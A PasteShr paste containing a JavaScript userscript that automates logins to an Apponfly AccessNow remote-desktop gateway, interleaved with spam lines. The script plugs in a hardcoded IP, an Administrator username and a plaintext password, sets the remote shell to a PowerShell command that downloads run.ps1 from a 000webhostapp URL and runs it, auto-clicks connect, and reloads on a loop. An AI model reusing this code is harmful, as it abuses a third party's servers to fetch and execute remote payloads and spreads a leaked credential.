htmlgw2.apponfly.com.4443/accessnow/start.html
var address = document.querySelector("[name='address']");
var password = document.querySelector("[name='html password'")
var full_address = document.querySelector("[name='full address']");
var con_check = document.querySelector("[name='connect to console']");
var application = document.querySelector("[name='remoteapplicationmode']");
var path = document.querySelector("[name='alternate shell']");
var user = document.querySelector("[name='username']")
window.setTimeout(function() {
htmlgw2.apponfly.com.4443/accessnow/start.html PasteShr htmlgw2.apponfly.com.4443/accessnow/start.html
con_check.checked = "checked";
application.checked = "checked";
path.value = "%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command (new-object System.Net.WebClient).DownloadFile('https://freetvlists.000webhostapp.com/run.ps1', 'C:\\Users\\Public\\Documents\\run.ps1'); & 'C:\\Users\\Public\\Documents\\run.ps1'";
user.value = ".\\Administrator";
window.setTimeout(function() {
full_address.value = "10.200.163.24";
address.value = "10.200.163.24";
htmlgw2.apponfly.com.4443/accessnow/start.html How to get it for free? htmlgw2.apponfly.com.4443/accessnow/start.html
password.value = "tumescence255";
window.setTimeout(function() {
simulate(document.querySelector(".btn"), "click");
}, 1000);
htmlgw2.apponfly.com.4443/accessnow/start.html How to dowload it? htmlgw2.apponfly.com.4443/accessnow/start.html
window.setTimeout(function() {
window.location.href = "https://htmlgw2.apponfly.com:4443/AccessNow/start.html?2";
},50000);
}, 1000);
htmlgw2.apponfly.com.4443/accessnow/start.html How to get it? htmlgw2.apponfly.com.4443/accessnow/start.html
}, 10000);
function simulate(element, eventName) {
var options = extend(defaultOptions, arguments[2] || {});
var oEvent, eventType = null;
for (var name in eventMatchers) {
if (eventMatchers[name].test(eventName)) {
htmlgw2.apponfly.com.4443/accessnow/start.html How to dowload it? htmlgw2.apponfly.com.4443/accessnow/start.html
eventType = name;
break;
}
}
if (!eventType)
throw new SyntaxError('Only HTMLEvents and MouseEvents interfaces are supported');
if (document.createEvent) {
oEvent = document.createEvent(eventType);
htmlgw2.apponfly.com.4443/accessnow/start.html How to get it for free? htmlgw2.apponfly.com.4443/accessnow/start.html
if (eventType == 'HTMLEvents') {
oEvent.initEvent(eventName, options.bubbles, options.cancelable);
} else {
oEvent.initMouseEvent(eventName, options.bubbles, options.cancelable, document.defaultView,
options.button, options.pointerX, options.pointerY, options.pointerX, options.pointerY,
options.ctrlKey, options.altKey, options.shiftKey, options.metaKey, options.button, element);
}
element.dispatchEvent(oEvent);
} else {
options.clientX = options.pointerX;
htmlgw2.apponfly.com.4443/accessnow/start.html How to get it? htmlgw2.apponfly.com.4443/accessnow/start.html
options.clientY = options.pointerY;
var evt = document.createEventObject();
oEvent = extend(evt, options);
element.fireEvent('on' + eventName, oEvent);
}
return element;
}
function extend(destination, source) {
for (var property in source)
htmlgw2.apponfly.com.4443/accessnow/start.html How to dowload it? htmlgw2.apponfly.com.4443/accessnow/start.html
destination[property] = source[property];
return destination;
}
var eventMatchers = {
'HTMLEvents': /^(?:load|unload|abort|error|select|change|submit|reset|focus|blur|resize|scroll)$/,
'MouseEvents': /^(?:click|dblclick|mouse(?:down|up|over|move|out))$/
}
var defaultOptions = {
pointerX: 0,
htmlgw2.apponfly.com.4443/accessnow/start.html How to dowload it? htmlgw2.apponfly.com.4443/accessnow/start.html
pointerY: 0,
button: 0,
ctrlKey: false,
altKey: false,
shiftKey: false,
metaKey: false,
bubbles: true,
cancelable: true
}
htmlgw2.apponfly.com.4443/accessnow/start.html